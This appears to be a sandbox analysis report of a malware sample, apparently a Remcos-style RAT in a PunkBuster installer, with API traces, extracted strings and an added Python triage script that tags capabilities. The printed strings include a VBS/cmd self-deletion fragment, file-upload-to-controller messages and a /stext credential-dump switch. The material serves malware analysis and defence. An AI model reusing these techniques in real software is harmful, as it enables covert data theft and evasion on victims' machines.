                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                              • String ID:
                                              • API String ID: 3658366068-0
                                              • Opcode ID: 70c4d232a8ac00affc6412479df1bf10091f9f1b39081f4e0f19fdb953068247
                                              • Instruction ID: 96e8e291c42f19a5d738ebee9ae961450227e08779f3b1fa7f8c1905a42b3616
                                              • Opcode Fuzzy Hash: 70c4d232a8ac00affc6412479df1bf10091f9f1b39081f4e0f19fdb953068247
                                              • Instruction Fuzzy Hash: 2B214731044B54AFCB316F26DC09A5ABBF1FF40325B108A2DE1E212AF1CF72A891DB44
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000D1C9A
                                                • Part of subcall function 000DAB38: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00125900,000CC07B,.vbs,?,?,?,?,?,001342F8), ref: 000DAB5F
                                                • Part of subcall function 000D76B6: CloseHandle.KERNEL32(000C3AB9,?,?,000C3AB9,00125324), ref: 000D76CC
                                                • Part of subcall function 000D76B6: CloseHandle.KERNEL32(00125324,?,?,000C3AB9,00125324), ref: 000D76D5
                                              • Sleep.KERNEL32(0000000A,00125324), ref: 000D1DEC
                                              • Sleep.KERNEL32(0000000A,00125324,00125324), ref: 000D1E8E
                                              • Sleep.KERNEL32(0000000A,00125324,00125324,00125324), ref: 000D1F30
                                              • DeleteFileW.KERNEL32(00000000,00125324,00125324,00125324), ref: 000D1F91
                                              • DeleteFileW.KERNEL32(00000000,00125324,00125324,00125324), ref: 000D1FC8
                                              • DeleteFileW.KERNEL32(00000000,00125324,00125324,00125324), ref: 000D2004
                                              • Sleep.KERNEL32(000001F4,00125324,00125324,00125324), ref: 000D201E
                                              • Sleep.KERNEL32(00000064), ref: 000D2060
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                              • String ID: /stext "
                                              • API String ID: 1223786279-3856184850
                                              • Opcode ID: 75453d274842fc963fdf19d721664c1d78ffdfea8681f0ffd112bf4d1fcbdcb9
                                              • Instruction ID: 43965cef5d26c958f0cede2a4a95966a48bc56fd6ecb0351b1b04551ddbd2207
                                              • Opcode Fuzzy Hash: 75453d274842fc963fdf19d721664c1d78ffdfea8681f0ffd112bf4d1fcbdcb9
                                              • Instruction Fuzzy Hash: 700212315083419AD328FB60D8A1FEFB7D5AFE6310F50492DF48A86293EF709A49C756
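Two memory images are interleaved in these records: the sample's own module at 0x400000 (the dumps flagged as image memory, which carry the PunkBuster Service Setup strings of an Even Balance installer) and a separate private region at 0xC0000 whose dump name carries protection 00000040, read here as PAGE_EXECUTE_READWRITE, and which holds the Remcos-specific strings such as "Uploading file to Controller:" and "/stext \"". Working through thousands of lines of this listing by hand is slow, so the following added example (editor's code, not Joe Sandbox's and not anything from the sample) parses the "APIs" / "String ID" records into per-function call lists and applies capability heuristics taken from the records on this page: read-only CreateFileW plus ReadFile with a "Controller" string (file upload to the C2), ControlService with control code 1 (SERVICE_CONTROL_STOP), GetModuleFileNameW plus Sleep plus DeleteFileW (self-deletion), and the /stext switch, which is the save-as-text option of the NirSoft recovery utilities; its link to credential theft is an inference, as the report does not name the tool. The sample records are abbreviated copies of this page's own blocks; the tag names and heuristics are the editor's assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One "• <API>.<MODULE>(<args>), ref: <addr>" line, optionally nested under a
# "Part of subcall function <addr>:" prefix; CRT refs like "_free.LIBCMT ref: ..." carry no args.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constructed sample: three records abbreviated from the blocks on this page (same line shapes).
SAMPLE = """\
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 000C7F4C
• GetFileSizeEx.KERNEL32(00000000,00000000), ref: 000C7FC2
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 000C8128
• CloseHandle.KERNEL32(00000000), ref: 000C8200
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000), ref: 000D9C94
• OpenServiceW.ADVAPI32(00000000,00000000,,?), ref: 000D9CAB
• ControlService.ADVAPI32(00000000,00000001,?), ref: 000D9CC7
• String ID:
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000D1C9A
  • Part of subcall function 000DAB38: GetCurrentProcessId.KERNEL32(00000000,75923530), ref: 000DAB5F
• Sleep.KERNEL32(0000000A,00125324), ref: 000D1DEC
• DeleteFileW.KERNEL32(00000000,00125324,00125324,00125324), ref: 000D1F91
  • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
• String ID: /stext "
"""

@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]          # callee address when the call is listed under a subcall

@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    @property
    def apis(self) -> set:
        return {c.api for c in self.calls}

    def first_ref(self) -> str:     # address of the first direct call, used as the record key
        return next((c.ref for c in self.calls if c.subcall is None), "?")

def parse_report(text: str) -> List[Function]:
    funcs: List[Function] = []
    cur: Optional[Function] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(raw)
        if line == "APIs":                      # each "APIs" label opens a new function record
            cur = Function()
            funcs.append(cur)
        elif cur is None:
            continue
        elif m:
            args = m.group("args").split(",") if m.group("args") is not None else []
            cur.calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
        elif line.startswith("• String ID:"):   # Joe Sandbox joins a function's strings with '$'
            body = line[len("• String ID:"):].strip()
            cur.strings = [s for s in body.split("$") if s]
    return funcs

SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}

def hexarg(call: Call, i: int) -> Optional[int]:
    """Constant argument i as an int, or None when the trace shows '?' (not a constant)."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None

def classify(fn: Function) -> List[str]:
    """Editor's heuristics for the capabilities seen on this page; not Joe Sandbox's signatures."""
    tags: List[str] = []
    apis = fn.apis
    if {"CreateFileW", "ReadFile"} <= apis:
        access = hexarg(next(c for c in fn.calls if c.api == "CreateFileW"), 1)
        if access == 0x80000000:                # GENERIC_READ only: the file is read, not modified
            mode = "read-only"
        else:
            mode = "access=?" if access is None else "access=0x%X" % access
        tags.append(f"reads a file ({mode})")
        if "send" in apis or any("Controller" in s for s in fn.strings):
            tags.append("file exfiltration to C2")
    for c in fn.calls:
        if c.api == "ControlService":           # second argument is the control code
            code = hexarg(c, 1)
            tags.append(f"sends {SERVICE_CONTROL.get(code, code)} to a service")
    if {"GetModuleFileNameW", "DeleteFileW", "Sleep"} <= apis:
        tags.append("self-delete with sleep/retry loop")
    if any(s.startswith("/stext") for s in fn.strings):
        # /stext is the save-as-text switch of the NirSoft recovery utilities; tying it to
        # credential theft is an inference, the report itself does not name the tool.
        tags.append("drives a /stext credential dump (inference)")
    return tags

def triage(text: str) -> Dict[str, List[str]]:
    """Map first call address -> capability tags, for every record that got at least one tag."""
    out: Dict[str, List[str]] = {}
    for fn in parse_report(text):
        tags = classify(fn)
        if tags:
            out[fn.first_ref()] = tags
    return out

if __name__ == "__main__":
    for ref, tags in triage(SAMPLE).items():
        print(ref, "->", "; ".join(tags))
```

Run it against a saved copy of the report text instead of SAMPLE to get one line per tagged function; the address in each line is the first direct `ref:` of that record, which is what to jump to in the dump loaded in a disassembler. The heuristics deliberately key on constant arguments (GENERIC_READ, SERVICE_CONTROL_STOP) rather than API names alone, because the PunkBuster installer code in the same sample also opens the service manager and files for legitimate reasons.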
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004079BA
                                                • Part of subcall function 004079B5: __EH_prolog.LIBCMT ref: 004078BB
                                              Strings
                                              • no-display, xrefs: 00407B79
                                              • **ERROR: You must specify install or un-install when using the no-prompts command-line switch., xrefs: 00407B2E
                                              • install-dlls, xrefs: 00407CE9
                                              • **ERROR: Error in command-line option specified., xrefs: 00407925, 00407945
                                              • skip-tests, xrefs: 00407CA9
                                              • **ERROR: You must specify install or un-install when using the no-display command-line switch., xrefs: 00407C45
                                              • Message, xrefs: 00407938, 00407B1E, 00407C38
                                              • install-nooverwrite, xrefs: 00407D34
                                              • no-prompts, xrefs: 00407A5B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: **ERROR: You must specify install or un-install when using the no-display command-line switch.$ **ERROR: You must specify install or un-install when using the no-prompts command-line switch.$ **ERROR: Error in command-line option specified.$Message$install-dlls$install-nooverwrite$no-display$no-prompts$skip-tests
                                              • API String ID: 3519838083-2197801583
                                              • Opcode ID: c8681db5e3eba06fd4c152a01befb50f4238c0d281412fb061c6c0f0b5522ca5
                                              • Instruction ID: b915994dbbd29f52d1ea4df70baef6de42778e44b1b756d3316263f1e49830fe
                                              • Opcode Fuzzy Hash: c8681db5e3eba06fd4c152a01befb50f4238c0d281412fb061c6c0f0b5522ca5
                                              • Instruction Fuzzy Hash: AEB1A130D05289EEDB00EF61C945BED7BB4AF11304F50406FE885272E2DBB86B49CB99
                                              APIs
                                                • Part of subcall function 00114650: CreateFileW.KERNEL32(00000000,00000000,?,00114A2B,?,?,00000000,?,00114A2B,00000000,0000000C), ref: 0011466D
                                              • GetLastError.KERNEL32 ref: 00114A96
                                              • __dosmaperr.LIBCMT ref: 00114A9D
                                              • GetFileType.KERNEL32(00000000), ref: 00114AA9
                                              • GetLastError.KERNEL32 ref: 00114AB3
                                              • __dosmaperr.LIBCMT ref: 00114ABC
                                              • CloseHandle.KERNEL32(00000000), ref: 00114ADC
                                              • CloseHandle.KERNEL32(?), ref: 00114C26
                                              • GetLastError.KERNEL32 ref: 00114C58
                                              • __dosmaperr.LIBCMT ref: 00114C5F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: a32b56bedcc994f839581ac6a60850539a3075bf4928f9d462dddaff9b70bee1
                                              • Instruction ID: fbd8ff4cdccffaf498c6945e8699b241d5d137a61061a8c3ca991d2ef4ca28a2
                                              • Opcode Fuzzy Hash: a32b56bedcc994f839581ac6a60850539a3075bf4928f9d462dddaff9b70bee1
                                              • Instruction Fuzzy Hash: A3A11232A041589FCF1D9F68D8527EE7BB1AB06324F24016DE811AF3D1DB718892CB95
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00401DA7
                                                • Part of subcall function 004016A9: __EH_prolog.LIBCMT ref: 004016AE
                                              Strings
                                              • n, xrefs: 00402055
                                              • SOFTWARE LICENSE AGREEMENTThe terms of this Software License Agreement (this "Agreement") shall apply to all versions, editions, and future updates of PunkBuster software and constitute a legal agreement between you (the "Licensee") and Even Balance, Inc. (t, xrefs: 00401F20
                                              • I &Agree, xrefs: 00401F7B
                                              • dialog, xrefs: 00401DB6
                                              • PunkBuster End User License Agreement, xrefs: 00401DCA
                                              • button, xrefs: 00401F6A, 00402012
                                              • text, xrefs: 00401E79
                                              • I &Disagree, xrefs: 00402023
                                              • , xrefs: 0040206C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: $I &Agree$I &Disagree$PunkBuster End User License Agreement$SOFTWARE LICENSE AGREEMENTThe terms of this Software License Agreement (this "Agreement") shall apply to all versions, editions, and future updates of PunkBuster software and constitute a legal agreement between you (the "Licensee") and Even Balance, Inc. (t$button$dialog$n$text
                                              • API String ID: 3519838083-3872559604
                                              • Opcode ID: 33d5fe19a2b34a0dc1b8605e66f3fe6fe93fc4ecdc2eb80d450ec21c1a0649d0
                                              • Instruction ID: 241a5a671ada6123a631bfefd5bb6ca2289978ba863265d408999d36451ca270
                                              • Opcode Fuzzy Hash: 33d5fe19a2b34a0dc1b8605e66f3fe6fe93fc4ecdc2eb80d450ec21c1a0649d0
                                              • Instruction Fuzzy Hash: 8DA1AF70D00349EAEB05DFA4CC45BEEBBB4AF05308F10852EE551B62E1DBB81B48CB59
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 65535$udp
                                              • API String ID: 0-1267037602
                                              • Opcode ID: 08571646cee7a88ed41693537ed2c1426c5e7bd922c8297254d65bffcea3f3c8
                                              • Instruction ID: 1c4a5f02da92bb15c3c11a6b7c5886dc54cc5839f768ec439057cd94f389e8e5
                                              • Opcode Fuzzy Hash: 08571646cee7a88ed41693537ed2c1426c5e7bd922c8297254d65bffcea3f3c8
                                              • Instruction Fuzzy Hash: F741F375609301ABD3A49A28E945B6B77E9EF84700F08482BF885963D1D764CE80DB77
                                              APIs
                                                • Part of subcall function 000D1699: TerminateProcess.KERNEL32(00000000,pth_unenc,000CE670), ref: 000D16A9
                                                • Part of subcall function 000D1699: WaitForSingleObject.KERNEL32(000000FF), ref: 000D16BC
                                                • Part of subcall function 000D265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,001342F8), ref: 000D2679
                                                • Part of subcall function 000D265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 000D2692
                                                • Part of subcall function 000D265D: RegCloseKey.KERNEL32(00000000), ref: 000D269D
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 000CC6C7
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00125900,00125900,00000000), ref: 000CC826
                                              • ExitProcess.KERNEL32 ref: 000CC832
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                              • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                              • API String ID: 1913171305-2411266221
                                              • Opcode ID: fbdc239a4843893773c8421267ad73ad7da80d24271633a03d6d0c095a1489c7
                                              • Instruction ID: da8997e3241d6891d90236ea1bea3acbadc248837a8418fac0f202eca4c792df
                                              • Opcode Fuzzy Hash: fbdc239a4843893773c8421267ad73ad7da80d24271633a03d6d0c095a1489c7
                                              • Instruction Fuzzy Hash: D9412331A10118AADB18F760DC56EFE7779AF61710F50416EF406A71D3EF306E9ACAA0
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0050F7E8,00000118,004BC183,00000001,00000000,0050ED98,00000008,004C6487,00000000,00000000,00000000), ref: 004C3F14
                                              • _strlen.LIBCMT ref: 004C3F3A
                                              • _strlen.LIBCMT ref: 004C3F4B
                                              • _strlen.LIBCMT ref: 004C3F6E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: _strlen$FileModuleName
                                              • String ID: ...$<program name unknown>$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
                                              • API String ID: 1637341245-1673886896
                                              • Opcode ID: 69a06e9b40fbf20122ab49d451b4c53a99b7e7dd79e971efd0f63ee4cc165297
                                              • Instruction ID: b9b3d884a23d04d5a9ae845288b9d500708d593b82c7f80a618a4aa3ed5d7893
                                              • Opcode Fuzzy Hash: 69a06e9b40fbf20122ab49d451b4c53a99b7e7dd79e971efd0f63ee4cc165297
                                              • Instruction Fuzzy Hash: 4131C671D40218ABDB10AF658C87FDE7AB4EF04718F10445FF411AA1C2DB7C9B518BAA
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,000C1AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000F93B9
                                              • GetLastError.KERNEL32(?,?,000C1AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000F93C6
                                              • __dosmaperr.LIBCMT ref: 000F93CD
                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,000C1AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000F93F9
                                              • GetLastError.KERNEL32(?,?,?,000C1AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000F9403
                                              • __dosmaperr.LIBCMT ref: 000F940A
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,000C1AD8,?), ref: 000F944D
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,000C1AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 000F9457
                                              • __dosmaperr.LIBCMT ref: 000F945E
                                              • _free.LIBCMT ref: 000F946A
                                              • _free.LIBCMT ref: 000F9471
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                              • String ID:
                                              • API String ID: 2441525078-0
                                              • Opcode ID: 2186cff1098e5f439e10bc789079d14fdd81131c894d8c4d3b5b132949f5e68b
                                              • Instruction ID: d5eafdc2cef70b5ba587b8774f8cb3c1fac0673aba0f44491a0dd4397ac091c9
                                              • Opcode Fuzzy Hash: 2186cff1098e5f439e10bc789079d14fdd81131c894d8c4d3b5b132949f5e68b
                                              • Instruction Fuzzy Hash: AB31C07190820EBFCF15AFA4CC45EBE3BBDEF11360B144119FA10966D0DB719D52ABA1
                                              APIs
                                              • GetObjectA.GDI32(?,00000018,?), ref: 004387F8
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00438819
                                              • CreateCompatibleDC.GDI32(00000000), ref: 0043881F
                                              • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00438833
                                              • SelectObject.GDI32(00000000,?), ref: 00438843
                                              • SelectObject.GDI32(00000000,00000000), ref: 0043884B
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00330008), ref: 0043886A
                                              • SelectObject.GDI32(00000000,?), ref: 00438876
                                              • SelectObject.GDI32(00000000,?), ref: 0043887E
                                              • DeleteDC.GDI32(00000000), ref: 00438887
                                              • DeleteDC.GDI32(00000000), ref: 0043888A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Object$Select$Create$CompatibleDelete$Bitmap
                                              • String ID:
                                              • API String ID: 1675015043-0
                                              • Opcode ID: 3c81d8e50dfcbfe49c593cb458a6f868211e41e6d112929c436eba2b5acf46bf
                                              • Instruction ID: 7984cc7a5a7bcc0b52638dd99ff42acabcd130bd69c8778fa69ada57451c190c
                                              • Opcode Fuzzy Hash: 3c81d8e50dfcbfe49c593cb458a6f868211e41e6d112929c436eba2b5acf46bf
                                              • Instruction Fuzzy Hash: 71214A71644340ABD210EB698CC0F6BBBE8EBCDB50F44092DF648972A1D675E8008B66
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 000C4E71
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 000C4F21
                                              • TranslateMessage.USER32(?), ref: 000C4F30
                                              • DispatchMessageA.USER32(?), ref: 000C4F3B
                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00133F80), ref: 000C4FF3
                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 000C502B
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                              • API String ID: 2956720200-749203953
                                              • Opcode ID: 6db07bedb5221c2031c458b36a9d3a58551b5416f557e1eb51510826e51694ef
                                              • Instruction ID: 31c9c8026770711460427171b496a09346ccbf6c7e78eb0a077e457135d23621
                                              • Opcode Fuzzy Hash: 6db07bedb5221c2031c458b36a9d3a58551b5416f557e1eb51510826e51694ef
                                              • Instruction Fuzzy Hash: E1418F71604300ABC714FB74D956EEEB7B9AB82710F404A2DF91297297EF34D905C7A2
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 004076BF
                                              • GetSystemDirectoryA.KERNEL32(?,00000400), ref: 004076F9
                                              • _strncat.LIBCMT ref: 0040770C
                                              • _strncat.LIBCMT ref: 00407786
                                              • _strncat.LIBCMT ref: 004077FB
                                                • Part of subcall function 00406B6C: _strlen.LIBCMT ref: 00406B78
                                                • Part of subcall function 00406AE7: __EH_prolog.LIBCMT ref: 00406AEC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: _strncat$H_prolog$DirectorySystem_strlen
                                              • String ID: Courier New$\LogFiles$\PunkBuster$\pbsvc.log
                                              • API String ID: 666638376-3571523793
                                              • Opcode ID: ece0d52ea7ba4d625339ed649b6e816857d466a14f5f7f22f28f37991c993d12
                                              • Instruction ID: 26f8c4236d45206483bf339da4866ef4be8d7202687d2feb97467a2a947cf969
                                              • Opcode Fuzzy Hash: ece0d52ea7ba4d625339ed649b6e816857d466a14f5f7f22f28f37991c993d12
                                              • Instruction Fuzzy Hash: FF5182B280115CAACB14EBA5DD85BDD77BC9F15304F1080BFE909A71C2DB385B89CB69
                                              APIs
                                              • _free.LIBCMT ref: 00106DDF
                                                • Part of subcall function 00106AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?), ref: 00106ADB
                                                • Part of subcall function 00106AC5: GetLastError.KERNEL32(?,?,0010FA50,?,00000000,?,00000000,?,0010FCF4,?,00000007,?,?,00110205,?,?), ref: 00106AED
                                              • _free.LIBCMT ref: 00106DEB
                                              • _free.LIBCMT ref: 00106DF6
                                              • _free.LIBCMT ref: 00106E01
                                              • _free.LIBCMT ref: 00106E0C
                                              • _free.LIBCMT ref: 00106E17
                                              • _free.LIBCMT ref: 00106E22
                                              • _free.LIBCMT ref: 00106E2D
